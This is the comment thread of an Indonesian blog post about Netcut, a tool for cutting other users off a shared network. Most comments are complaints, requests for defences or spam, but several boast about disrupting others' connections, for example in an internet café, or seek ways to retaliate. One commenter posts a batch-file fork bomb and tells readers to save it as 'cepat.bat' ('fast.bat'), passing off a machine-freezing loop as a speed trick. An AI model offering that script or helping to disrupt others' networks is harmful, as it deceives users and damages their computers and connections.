      gw gak pernah kena Netcut…hbs sy fasilitas internetan diktr bebas… dirumah jg bebas, tp sy ingetkan bagi org yg gunain sfwre Netcut jgn suka iseng ngecut org yg lg interntan di tmpt umum…., kasihan. Coba klo anda sndri yg kena Netcut ,… kan kesel.

  104. Maret 22, 2011 pukul 1:01 am | #156

    thanks infonya…

  105. dadh
  106. Korban Netcut
    April 4, 2011 pukul 10:57 pm | #158

    Sialan,,temen sendiri usil disaat yang kurang tepat,,dia netcut gue,,padahal gue lagi bikin tgas sekolah. . . .gue langsung aja pulang skolah ngegusur dia tuk diberi pelajaran,,pulangnya babak belur tuhh tmn sendiri. . . .

  107. April 19, 2011 pukul 4:12 am | #160

    mas kok saya ga ketemu ya IP orang lain di netcutnya,,,,
    pliiissss share

  108. cris
    April 19, 2011 pukul 6:50 pm | #161

    wduh ane dah ksel,, ma ni tool..di kmpus bnyak bnget yg pke netcut,,,internet ampe mati….
    cara nalanginnya gmna ni gan…?

  109. Mei 9, 2011 pukul 1:16 pm | #162

    nice post gan, terima kasih buat infonya, sangat membantu. salam kenal dan sukses selalu.

  110. Mei 24, 2011 pukul 3:57 pm | #163

    jaringan……….

  111. Mei 29, 2011 pukul 1:57 pm | #164

    kasih

  112. apalah arti sebuah nama
    Juni 10, 2011 pukul 5:30 pm | #165

    WEiz,..
    Naiz Infoh gan!!!
    Hatur Nuhun dah atas ilmunya ^^,

  113. ARIF FARES
    Juli 24, 2011 pukul 5:33 pm | #166

    CARANYA gitu ya, ternyata koneksi ku di putus ama orang SUPER BANGSAT, Nice Info^^

  114. zapry saprianus
    Agustus 7, 2011 pukul 10:14 pm | #167

    netcut supor pada wnidos 7?????ap yaaahhhhhhh

  115. Agustus 17, 2011 pukul 2:52 am | #168

    kalau yang di postingan ini se[ertinya versi jadul, gak jalan di windos tujuh

  116. arif pratama
    Agustus 21, 2011 pukul 12:24 pm | #169

    Gimana caranya nyerang balik netcut?

  117. September 18, 2011 pukul 2:25 am | #170

    mantap mas..

    tapi untuk mikrotik bisa gag itu mas ?

    salam
    cheat ninja saga and tips blogger

  118. Jyotis
    September 20, 2011 pukul 2:57 pm | #171

    Ada antispy buat windows 7 gak gan? trus gak ada cara supaya pengguna netcut gak bisa ngecut orang lain tanpa orang lain harus pake apa – apa (kita buat program netcut orang itu gak berfungsi). Tolong e-mail saya secepatnya ya gan. Soalnya saya ada temen jengkelin meski uda dibilang jangan berapa kali, masih tetep pake netcut. Tapi saya gak tega pake kekerasan atau bikin labtop kesayangannya hang pake cara2 yang ada di internet.

  119. supriadi
    Oktober 5, 2011 pukul 5:30 pm | #172

    <sama juga g bisa d cut ip orang lain,,,,

  120. virza
    Desember 15, 2011 pukul 11:35 am | #173

    nda bsa nge netcut ip orang laen

  121. Februari 9, 2012 pukul 11:36 am | #174

    bloem bza,,,,
    pngen mncba2 cieh,,,,,
    tpi msih bingung,,,,,

  122. Februari 12, 2012 pukul 10:14 pm | #175

    http://mubamba.blogspot.com/ open yes thanks you

  123. Februari 13, 2012 pukul 5:39 pm | #176

    nah nah…cara untuk melepas dari net cut itu yang seperti yang ada di Om wiro-com
    instal Netcut yang terbaru, trus detect semua ip dan Mac addres, lalu samakan mac addres komputer kamu dengan mac address komputer yang lagi pake netcut…coba saja mulai dari mac address yang pertama sampai akhir. Masalahnya, kalo ada banyak mac addres apa harus di coba satu satu ??? GimaNa Om wiro-com ?

  124. Februari 16, 2012 pukul 8:43 pm | #177

    nyantei aj gan,,ad radmin viewer :)

    kdetek pke netcut,,langsung tonjooo_O’k
    “destroy and kill” :D

  125. Jibek
    Mei 30, 2012 pukul 10:42 pm | #178

    Malam gan ni q mau cari solusi. Gini critananya di pabriku ada fasilitas wi-fi,dan ada 2 laptop yaitu temenku dan q, di laptop temen saya dia pasang NETCUT,.. terus kalo dia hidupin dia punya laptop sering kali NETCUT dia juga di hidupin,anehnya bila laptop saya menyusul saya hidupin,atau keduluan dia hidupin laptop dan NETCUT nya pasti saya g bs konek ke internet,di bar signal saya penuh signyal tapi ada icon warna kuning bertanda tanda seru.jadi kesimpulannya sebelum dia cut off IP saya,saya sudah mati duluan. Ppertanyaannya: kenapa bisa demikian??? Dan bagaimana solusinya untuk mengatasi masalah ini,critanya saya mau perang jaringan ma dia,jd diam2 saya bs membalas cara2 busuk dia. demikian mohon pencerahannya,di tggu secepatnya balasan agan…..

  126. Agustus 1, 2012 pukul 5:36 pm | #179

    /Bantu aku dong caranya download dan pake netcut

    • eryc
      September 8, 2012 pukul 11:19 am | #180

      pln selalu bisa mengatasi masalah

  127. suryo
    Oktober 15, 2012 pukul 6:22 pm | #181

    coba tuliskan nih di komputer kalian dengan notepad

    :s
    start %0
    goto :s

    lalu save as dengan nama cepat.bat tapi all files y

  128. April 10, 2013 pukul 12:08 pm | #182

    Superb Blog! Many thanks!

  129. I kill U with Netcut
    Mei 22, 2013 pukul 12:43 pm | #183

    mmg sippp netcut…gw maen dwarnet , gw praktekin ampuh. dr 40PC gw matiin 10,jd pada binggung smua wkakaka… bwt download maknyuss ga ada yg halangin

  130. Januari 28, 2014 pukul 9:34 am | #184

    Hi to every body, it’s my first go to see of this webpage; this weblog
    includes amazing and really good stuff designed for readers.

  1. Januari 16, 2010 pukul 10:17 pm | #1
  2. September 11, 2011 pukul 1:45 am | #2

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Ikuti

Get every new post delivered to your Inbox.

Bergabunglah dengan 180 pengikut lainnya.

%d bloggers like this: